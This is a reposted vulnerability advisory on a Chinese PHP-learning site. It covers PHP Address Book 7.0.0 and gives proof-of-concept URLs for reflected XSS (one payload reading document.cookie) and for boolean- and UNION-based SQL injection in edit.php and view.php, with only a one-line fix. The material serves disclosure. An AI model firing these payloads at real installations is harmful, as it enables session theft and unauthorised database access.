来源:自学PHP网 时间:2015-04-17 13:02 作者: 阅读:次
[导读] 标题: PHP Address Book 7.0.0 Multiple security vulnerabilities作者: Stefan Schurtz受影响软件: Successfully tested on PHP Address Book 7.0.0开发者网站: http://sourceforge.net/proje......
标题: PHP Address Book 7.0.0 Multiple security vulnerabilities
作者: Stefan Schurtz 受影响软件: Successfully tested on PHP Address Book 7.0.0 开发者网站: http://sourceforge.net/projects/php-addressbook/ 缺陷描述 PHP Address Book 7.0.0含多个 XSS 和 SQLi缺陷 测试方法 // XSS http://[target]/addressbookv7.0.0/preferences.php?from='"</script><script>alert('xss')</script> http://www.2cto.com /addressbookv7.0.0/group.php/" /><script> alert('xss')</script> http://[target]/addressbookv7.0.0/index.php?group='"</script><script>alert(document.cookie)</script> // SQLi http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1<2,2,1) http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1>2,2,1) // UNION-based Injection, needs 'magic_quotes=off' http://[target]/addressbookv7.0.0/view.php?id=1' UNION ALL SELECT NULL, NULL, version(), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--+ 修复: 加强过滤 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com